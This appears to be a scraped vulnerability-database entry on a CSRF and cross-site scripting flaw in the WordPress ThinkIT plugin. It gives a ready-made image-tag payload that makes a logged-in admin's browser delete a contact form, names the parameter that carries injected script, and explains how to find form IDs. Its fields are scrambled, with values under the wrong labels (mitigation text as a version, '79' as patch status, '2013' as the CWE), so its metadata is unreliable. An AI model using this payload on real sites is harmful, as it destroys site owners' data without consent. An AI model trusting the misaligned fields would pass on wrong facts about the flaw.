vendor:
a:thinkoverit:thinkit
by:
MEDIUM
which [ID] is the form ID
CVSS
following crafted exploit may be used so as to delete form completely: <img src=\""http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf\"" width=\""1\"" height=\""1\"">. Cross site scripting can be done by using http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf"
CSRF/XSS
Yashar shahinzadeh
CWE
Product Name: a:thinkoverit:thinkit
Affected Version From: Update to the latest version of the plugin
Affected Version To: Yes
Patch Exists: 79
Related CWE: 2013
CPE: 0.1
Other Scripts:
https://www.exploit-db.com/raw/27751
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Thinkoverit
4,3
WordPress ThinkIT plugin – CSRF / XSS
Contact form ID can be easily understood from HTML page source, <input type="hidden"" value=""[ID]"" name=""toit-form-id""></input>
Mitigation:
N/A
